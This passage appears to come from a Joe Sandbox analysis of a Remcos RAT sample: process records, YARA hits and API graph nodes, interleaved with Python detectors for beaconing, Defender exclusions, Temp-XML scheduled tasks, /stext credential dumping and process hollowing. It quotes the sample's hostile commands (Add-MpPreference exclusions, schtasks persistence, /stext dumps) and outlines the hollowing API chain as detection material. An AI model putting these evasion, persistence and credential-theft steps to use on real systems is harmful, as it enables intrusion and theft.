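            continue
        for i in range(1, len(ports)):
            if not (_port_ok(ports[:i]) and _port_ok(ports[i:])):
                continue
            for j in range(1, len(g[3])):  # g[3] = last octet of src + first of dst
                if _octet_ok(g[3][:j]) and _octet_ok(g[3][j:]):
                    out.append((int(ports[:i]), int(ports[i:]),
                                ".".join((a1, g[1], g[2], g[3][:j])),
                                ".".join((g[3][j:], g[4], g[5], g[6]))))
    return out


def parse_rows(text):
    """Keep per row the reading whose reverse flow also occurs; drop the rest as unresolvable."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m["ts"], "%b %d, %Y %H:%M:%S")
            ts += timedelta(microseconds=int(m["frac"][:6].ljust(6, "0")))
            rows.append((ts, candidates(m["tail"])))
    support = Counter(c for _, cands in rows for c in cands)
    flows = []
    for ts, cands in rows:
        score, best = max(((support[(c[1], c[0], c[3], c[2])], c) for c in cands),
                          default=(0, None))
        if score:
            flows.append((ts, *best))
    return flows


def beacons(flows, min_packets=5, jitter=0.2, regular_share=0.8):
    """Flag flows whose inter-packet gaps cluster around one period. Not every gap
    must match: the first Remcos packet is the registration, not a heartbeat."""
    by_flow = {}
    for ts, sp, dp, src, dst in flows:
        by_flow.setdefault((src, sp, dst, dp), []).append(ts)
    found = []
    for key, times in by_flow.items():
        if len(times) < min_packets:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        period = median(gaps)
        regular = sum(abs(g - period) <= jitter * period for g in gaps)
        if period > 0 and regular >= regular_share * len(gaps):
            found.append((key, round(period, 1), len(times)))
    return found
```

Calling `beacons(parse_rows(ROWS))` on the rows above returns both directions of the 49712/2404 flow with a 30.0 s period, and nothing for the single geoplugin.net request. The reverse-flow check is what makes the fused columns safe to parse: "4971480" could be 4971/480 or 49714/80, and "192.168.2.5178.237.33.50" could end in .5 or .51, but only 49714/80 between 192.168.2.5 and 178.237.33.50 has a matching reply row. Rows with no reply in the capture are dropped rather than guessed.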


                                                            Target ID:0
                                                            Start time:13:36:59
                                                            Start date:28/10/2024
                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe"
                                                            Imagebase:0x140000
                                                            File size:1'144'840 bytes
                                                            MD5 hash:03A6863E7931768C020F1A98531E5212
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:13:37:01
                                                            Start date:28/10/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe"
                                                            Imagebase:0x330000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:13:37:02
                                                            Start date:28/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:13:37:02
                                                            Start date:28/10/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe"
                                                            Imagebase:0x330000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:13:37:02
                                                            Start date:28/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:13:37:02
                                                            Start date:28/10/2024
                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp8E60.tmp"
                                                            Imagebase:0xe0000
                                                            File size:187'904 bytes
                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true
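Targets 3, 5 and 7 above are the defence-evasion and persistence steps behind the Sigma hits in the summary: two Add-MpPreference exclusions (the second for the dropped copy under AppData\Roaming) and a scheduled task imported from an XML in the user's Temp folder. The Python below is an added example, not code from the report or from Joe Security. It runs rule logic of this example's own design, an approximation of those two Sigma titles rather than the rules themselves, over the image paths and command lines copied from the process records, and then correlates the task name with the excluded binary.

```python
"""Flag Defender-exclusion and temp-XML scheduled-task command lines and correlate them.

Added example, not code from the Joe Sandbox report. PROCESSES is copied from the
report's process records; the regexes and the correlation step are this example's own.
"""
import re

# (target id, image path, command line), copied from the report's process records.
PROCESSES = [
    (0, r"C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe",
     r'"C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe"'),
    (3, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath '
     r'"C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe"'),
    (4, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    (5, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath '
     r'"C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe"'),
    (7, r"C:\Windows\SysWOW64\schtasks.exe",
     r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" '
     r'/XML "C:\Users\user\AppData\Local\Temp\tmp8E60.tmp"'),
]

# Rule patterns of this example's own design (not the Sigma rules the report cites).
EXCLUSION_RE = re.compile(
    r'(?i)\bAdd-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)\s+"?([^"]+?)"?(?:\s|$)')
TASK_RE = re.compile(r'(?i)/tn\s+"?([^"]+?)"?\s.*?/xml\s+"?([^"]+?)"?(?:\s|$)')


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def scan(processes):
    """One finding per matching command line, in record order.

    Match on the image path, not the command line: the sample launched the
    SysWOW64 powershell.exe while its command line still spells the System32 path.
    """
    findings = []
    for target, image, cmd in processes:
        name = image_name(image)
        if name == "powershell.exe" and (m := EXCLUSION_RE.search(cmd)):
            findings.append({"rule": "defender_exclusion", "target": target, "path": m.group(1)})
        elif name == "schtasks.exe" and re.search(r"(?i)/create\b", cmd) and (m := TASK_RE.search(cmd)):
            if "\\temp\\" in m.group(2).lower():
                findings.append({"rule": "task_from_temp_xml", "target": target,
                                 "task": m.group(1), "xml": m.group(2)})
    return findings


def correlate(findings):
    """Pair a task with an exclusion whose binary carries the task's name stem
    (task mXJeXQoaGktJCW <-> mXJeXQoaGktJCW.exe): the same implant is being both
    hidden from Defender and scheduled, a stronger signal than either event alone."""
    excluded = {f["path"].rsplit("\\", 1)[-1].rsplit(".", 1)[0].lower(): f["path"]
                for f in findings if f["rule"] == "defender_exclusion"}
    pairs = []
    for f in findings:
        if f["rule"] == "task_from_temp_xml":
            stem = f["task"].rsplit("\\", 1)[-1].lower()
            if stem in excluded:
                pairs.append((f["task"], excluded[stem]))
    return pairs
```

`scan(PROCESSES)` yields three findings (targets 3, 5 and 7) and `correlate` pairs the `Updates\mXJeXQoaGktJCW` task with the excluded `mXJeXQoaGktJCW.exe`. The exclusion for the original sample on the Desktop stays a single-event hit, which is the right outcome: the dropped copy in AppData\Roaming is the one the task keeps alive.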

                                                            Target ID:8
                                                            Start time:13:37:02
                                                            Start date:28/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:13:37:02
                                                            Start date:28/10/2024
                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe"
                                                            Imagebase:0x920000
                                                            File size:1'144'840 bytes
                                                            MD5 hash:03A6863E7931768C020F1A98531E5212
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:10
                                                            Start time:13:37:03
                                                            Start date:28/10/2024
                                                            Path:C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe
                                                            Imagebase:0xf70000
                                                            File size:1'144'840 bytes
                                                            MD5 hash:03A6863E7931768C020F1A98531E5212
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 24%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:13:37:04
                                                            Start date:28/10/2024
                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                            Imagebase:0x7ff6ef0c0000
                                                            File size:496'640 bytes
                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                            Has elevated privileges:true
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:13:37:06
                                                            Start date:28/10/2024
                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp9E3E.tmp"
                                                            Imagebase:0xe0000
                                                            File size:187'904 bytes
                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:13
                                                            Start time:13:37:06
                                                            Start date:28/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:14
                                                            Start time:13:37:06
                                                            Start date:28/10/2024
                                                            Path:C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe"
                                                            Imagebase:0x1d0000
                                                            File size:1'144'840 bytes
                                                            MD5 hash:03A6863E7931768C020F1A98531E5212
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:15
                                                            Start time:13:37:06
                                                            Start date:28/10/2024
                                                            Path:C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe"
                                                            Imagebase:0xdd0000
                                                            File size:1'144'840 bytes
                                                            MD5 hash:03A6863E7931768C020F1A98531E5212
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.2097259168.00000000014D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:16
                                                            Start time:13:37:10
                                                            Start date:28/10/2024
                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\vkwehamdpyfugcryqteiojtur"
                                                            Imagebase:0x1b0000
                                                            File size:1'144'840 bytes
                                                            MD5 hash:03A6863E7931768C020F1A98531E5212
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:17
                                                            Start time:13:37:10
                                                            Start date:28/10/2024
                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\vkwehamdpyfugcryqteiojtur"
                                                            Imagebase:0xee0000
                                                            File size:1'144'840 bytes
                                                            MD5 hash:03A6863E7931768C020F1A98531E5212
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:18
                                                            Start time:13:37:10
                                                            Start date:28/10/2024
                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\xmcxhkxfdgxhrrnkzezbznfdacwy"
                                                            Imagebase:0xf0000
                                                            File size:1'144'840 bytes
                                                            MD5 hash:03A6863E7931768C020F1A98531E5212
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:19
                                                            Start time:13:37:10
                                                            Start date:28/10/2024
                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\xmcxhkxfdgxhrrnkzezbznfdacwy"
                                                            Imagebase:0xfc0000
                                                            File size:1'144'840 bytes
                                                            MD5 hash:03A6863E7931768C020F1A98531E5212
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:20
                                                            Start time:13:37:10
                                                            Start date:28/10/2024
                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\ighpidhzropmtxboqpldcaaujighwuh"
                                                            Imagebase:0x7c0000
                                                            File size:1'144'840 bytes
                                                            MD5 hash:03A6863E7931768C020F1A98531E5212
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

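Two behaviours in the process list above are worth turning into detection logic: schtasks.exe registering a task named "Updates\mXJeXQoaGktJCW" from an XML file in the user's Temp directory (the Sigma hit "Scheduled temp file as task from temp location"), and the sample re-launching itself with a "/stext <tempfile>" argument, which is the "save as text" switch of the NirSoft password-recovery tools that Remcos embeds for its credential theft. The following Python is an added example, not part of the Joe Sandbox report: it runs a Sysmon/4688-style scan over process-creation events constructed from the report's command lines. The pids are illustrative (the report shows target IDs, not pids) and the sample image name is shortened.

```python
"""Detection over process-creation events for two behaviours in the process
list: schtasks.exe creating a task from a Temp-directory XML, and a process
re-launching itself with the NirSoft-style /stext switch. Events are
constructed from the report's command lines; pids are illustrative."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process image
    cmdline: str    # command line as logged (Sysmon EventID 1 / 4688 style)


# Constructed sample events, modelled on the report's process tree.
SAMPLE_EVENTS = [
    ProcEvent(1001, 500, r"C:\Users\user\Desktop\sample.exe",
              r'"C:\Users\user\Desktop\sample.exe"'),
    ProcEvent(1002, 1001, r"C:\Windows\SysWOW64\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" '
              r'/XML "C:\Users\user\AppData\Local\Temp\tmp8E60.tmp"'),
    ProcEvent(1003, 1001, r"C:\Users\user\Desktop\sample.exe",
              r'C:\Users\user\Desktop\sample.exe /stext '
              r'"C:\Users\user\AppData\Local\Temp\vkwehamdpyfugcryqteiojtur"'),
    # Benign-looking control: task XML outside any Temp directory.
    ProcEvent(1004, 600, r"C:\Windows\System32\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /Create /TN "Backup" /XML "C:\ProgramData\Backup\task.xml"'),
    ProcEvent(1005, 600, r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.IGNORECASE)
SCHTASKS_XML_RE = re.compile(r'/XML\s+"?([^"\s]+)"?', re.IGNORECASE)
STEXT_RE = re.compile(r'/stext\s+"?([^"\s]+)"?', re.IGNORECASE)


def schtasks_from_temp(ev):
    """Flag schtasks /Create whose /XML definition lives in a Temp directory."""
    if not ev.image.lower().endswith(r"\schtasks.exe"):
        return None
    if "/create" not in ev.cmdline.lower():
        return None
    m = SCHTASKS_XML_RE.search(ev.cmdline)
    if m and TEMP_DIR_RE.search(m.group(1)):
        return f"scheduled task created from temp XML: {m.group(1)}"
    return None


def stext_self_spawn(ev, by_pid):
    """Flag the /stext switch; note when the parent runs the same image
    (the sample launching a copy of itself to run the embedded tool)."""
    m = STEXT_RE.search(ev.cmdline)
    if not m:
        return None
    parent = by_pid.get(ev.ppid)
    same_image = parent is not None and parent.image.lower() == ev.image.lower()
    note = " (self-spawned)" if same_image else ""
    return f"/stext credential dump to {m.group(1)}{note}"


def scan(events):
    """Return [(pid, reason)] for every event matching either rule."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        for result in (schtasks_from_temp(ev), stext_self_spawn(ev, by_pid)):
            if result:
                hits.append((ev.pid, result))
    return hits


if __name__ == "__main__":
    for pid, reason in scan(SAMPLE_EVENTS):
        print(pid, reason)
```

The schtasks rule keys on the XML path rather than the task name because the name ("Updates\<random>") changes per build while the Temp-directory XML is structural to this loader. The /stext rule is weak on its own (legitimate NirSoft use exists) but becomes high-confidence when the parent and child share an image path and the output file is an extensionless random name under Temp, exactly as in target IDs 16 to 20.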
                                                              Execution Graph

                                                              Execution Coverage:10.5%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:1.1%
                                                              Total number of Nodes:265
                                                              Total number of Limit Nodes:7
                                                              [Execution graph is rendered as an interactive widget; the raw node dump is omitted. API nodes present in the graph: CreateProcessA (0x44f4329), VirtualAllocEx (0x44f3f58, 0x44f3f98), ReadProcessMemory (0x44f4153), WriteProcessMemory (0x44f4060), Wow64SetThreadContext (0x44f3e80, 0x44f3ec5), ResumeThread (0x44f3998, 0x44f39d8), PostMessageW (0x44f8978); GetCurrentProcess, GetCurrentThread, GetCurrentThreadId (0x232d2e6 to 0x232d3d3), GetModuleHandleW (0x232b240), CreateActCtxA (0x23244c4, 0x23258f8), DuplicateHandle (0x232d4e8); NtQueryInformationProcess (0x5068f58), OutputDebugStringW (0x5069c08), CloseHandle (0x5069cb8).]
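The cluster of nodes around 0x44f3xxx to 0x44f4xxx is the classic process-hollowing (RunPE) chain that the report's "Injects a PE file into a foreign processes" and "Maps a DLL or memory area into another process" signatures describe: CreateProcessA, VirtualAllocEx, WriteProcessMemory (with ReadProcessMemory interleaved), Wow64SetThreadContext, ResumeThread. The Python below is an added example, not code from the report: an ordered-stage matcher that flags a caller driving a target process through that chain. The (caller, api, target) events are constructed to mirror the graph's nodes with illustrative pids; the graph shows call order only, so pairing calls by target pid is an assumption about what a real API trace (an API monitor, or hook/ETW-based EDR telemetry) would supply.

```python
"""Ordered API-sequence matcher for the process-hollowing chain seen in the
execution graph. Events are constructed (caller_pid, api, target_pid)
triples with illustrative pids; the caller/target pairing is an assumption
since the graph records only call order, not handles."""
from collections import defaultdict

# Each stage is satisfied by any API name in its set. The Nt* entries cover
# the native-API names a trace would show if the sample called ntdll directly.
HOLLOWING_STAGES = (
    {"CreateProcessA", "CreateProcessW", "NtCreateUserProcess"},
    {"VirtualAllocEx", "NtAllocateVirtualMemory"},
    {"WriteProcessMemory", "NtWriteVirtualMemory"},
    {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"},
    {"ResumeThread", "NtResumeThread"},
)

API_EVENTS = [  # constructed: (caller_pid, api, target_pid)
    (100, "CreateProcessA", 101),
    (100, "VirtualAllocEx", 101),
    (100, "ReadProcessMemory", 101),     # reads appear in the graph but are not a stage
    (100, "WriteProcessMemory", 101),
    (100, "WriteProcessMemory", 101),    # headers and sections are written separately
    (100, "Wow64SetThreadContext", 101),
    (100, "ResumeThread", 101),
    (200, "CreateProcessW", 201),        # launcher starting a child suspended...
    (200, "ResumeThread", 201),          # ...then resuming it without writing memory
    (300, "ReadProcessMemory", 101),     # unrelated reader of the target (e.g. a debugger)
]


def find_hollowing(events):
    """Return [(caller, target, [apis])] for every (caller, target) pair that
    reaches all stages in order. Other calls may be interleaved and a stage
    may repeat; only the first API that advances each stage is recorded."""
    progress = defaultdict(int)    # (caller, target) -> index of next stage
    matched = defaultdict(list)    # (caller, target) -> APIs that advanced it
    hits = []
    for caller, api, target in events:
        key = (caller, target)
        idx = progress[key]
        if idx >= len(HOLLOWING_STAGES):
            continue               # already reported for this pair
        if api in HOLLOWING_STAGES[idx]:
            progress[key] = idx + 1
            matched[key].append(api)
            if progress[key] == len(HOLLOWING_STAGES):
                hits.append((caller, target, list(matched[key])))
    return hits


if __name__ == "__main__":
    for caller, target, apis in find_hollowing(API_EVENTS):
        print(f"pid {caller} hollowed pid {target}: {' -> '.join(apis)}")
```

The launcher pair (200, 201) is the usual false-positive source: suspended start plus resume is legitimate, so the matcher requires a remote allocation and a remote write before the context change. Production logic should additionally key on the process handle returned by CreateProcess and on the CREATE_SUSPENDED flag, neither of which the sandbox graph exposes.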
                                                              APIs
                                                              • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 05068FD7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: InformationProcessQuery
                                                              • String ID:
                                                              • API String ID: 1778838933-0
                                                              • Opcode ID: 91f73154baf9763b24eac4351879c453451e78a0c767af54cf3dbb16e81f9d66
                                                              • Instruction ID: 2a6dc2e74dfbc13cf6233b7ace7d976d97864d606439053a2e88d0022cf7af86
                                                              • Opcode Fuzzy Hash: 91f73154baf9763b24eac4351879c453451e78a0c767af54cf3dbb16e81f9d66
                                                              • Instruction Fuzzy Hash: 4E21E0B6900249DFCB10CF9AD884ADEFBF4FF48310F10852AE919A7211D375A944CFA5
                                                              APIs
                                                              • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 05068FD7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: InformationProcessQuery
                                                              • String ID:
                                                              • API String ID: 1778838933-0
                                                              • Opcode ID: 9655cff9a207650ec577caf262c4a9e1cddb161e43accf658b4202349b6d6a34
                                                              • Instruction ID: 03d9c3ccf94a6eeed56e30deba3e299fd8ca6cdb44b71726bd5a97a987329af8
                                                              • Opcode Fuzzy Hash: 9655cff9a207650ec577caf262c4a9e1cddb161e43accf658b4202349b6d6a34
                                                              • Instruction Fuzzy Hash: EC21EFB5904249DFCB10DF9AD884ADEBBF5FF48310F10842AE919A7211C375A944CFA5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
